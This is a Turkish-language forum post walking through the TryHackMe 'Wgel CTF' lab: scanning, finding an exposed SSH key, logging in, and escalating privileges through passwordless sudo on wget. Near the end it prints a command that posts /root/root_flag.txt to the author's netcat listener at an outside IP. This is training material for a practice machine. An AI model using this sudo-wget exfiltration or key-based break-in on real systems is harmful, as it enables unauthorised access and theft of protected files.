TryHackMe Wgel CTF Writeup

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18

Eren Yılmaz tarafından 31 Ocak 2021 tarihinde yazılmıştır.​

Merhaba bu makalemizde tryhackme'de bulunan Wgel CTF isimli odayı hep beraber çözeceğiz, başlayalım.

İlk önce agresif bir nmap taraması yapıyoruz, nmap ağ hakkında aktif bilgi toplayabileceğimiz bir bilgi toplama aracıdır.

namp -A 10.10.213.167
1705946289506.png


2 adet açık bağlantı noktamız var, biri 80 diğeri ise 22 numaralı bağlantı noktası. 80 numaralı bağlantı noktasında bir adet web sitesi ayakta, 22 numaralı bağlantı noktasında ise ssh servisi ayakta. Biz herkese açık olduğu için webden yürüyelim, dizinleri aramak için gobuster isimli aracı kullanabiliriz.

1705946295589.png


1 adet dizin bulduk, sitemap dizininde fazla bir şey bulamıyoruz bu yüzden sitemap dizinine de bir adet dizin taraması yapıyoruz.

Ve evet! bir adet ssh anahtarı bulduk.

1705946301519.png


bununla birlikte oturum açabiliriz ama bize bir kullanıcı ismi lazım bunun için sitenin kaynak koduna baktığımızda şöyle bir metin görüyoruz.

<!-- Jessie don't forget to udate the webiste -->
1705946307548.png


Bu metinden yola çıkarak kullanıcın isminin "Jessie" olduğunu anlıyoruz, şimdi ssh'a bağlanacağız. Bağlanmadan önce id_rsa dosyasına belirli izinler tanımlamamız gerekli, aşağıdaki şekilde tanımlayabiliriz.

Şimdi ssh'a bağlanalım.

Ve evet içerideyiz!

1705946314679.png


İçerideki dizinleri biraz araştırdığımızda kullanıcı bayrağının doküman dizininde olduğunu görüyoruz, bayrağı okumak için cat veya less araçlarını kullanabiliriz. Neyse bayrağa bakalım.

cat user_flag.txt
less user_flag.txt (alternatif)
1705946319610.png


Şimdi yetkimizi yükseltmemiz gerekli, bunun için ilk önce nerelerin yönetici yetkisine ihtiyaç duyduğuna bakmalıyız, aşağıdaki komutu kullanabiliriz.

1705946325507.png


Komutun çıktısına baktığımızda /usr/bin/wget adresinde şifresiz bir şekilde yönetici olabileceğimizi görüyoruz, bunu istismar edebiliriz. İstismar etmek için detaylı kaynak olarak burayı kullanabilirsiniz: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/ . Şimdi orada verilen komutu girerek makinemizi istismar edelim.

İlk önce netcat ile kendi bilgisayarımızı dinlemeye almalıyız.

Şimdi karşı makinede şu komutu girelim, ip adresi yazılan kısıma tryhackme'nin size tanımladığı ip'yi girmelisiniz.

sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.9.30.197:5050

Flag​

Burada wget dizinini kullandığımızdan dolayı yönetici izni alırken makine bizden şifre istemedi, şimdi netcat ile dinleme yaptığımız terminal sekmesine gidip bize herhangi bir tepki vermiş mi? diye bir bakalım. Evet vermiş! yönetici bayrağımızın değeri karşımızda, bayrağı girip makineyi bitirelim.

1705946332491.png


Daha fazla içerik için sitemizi takip edebilirsiniz!
 
Geri
Üst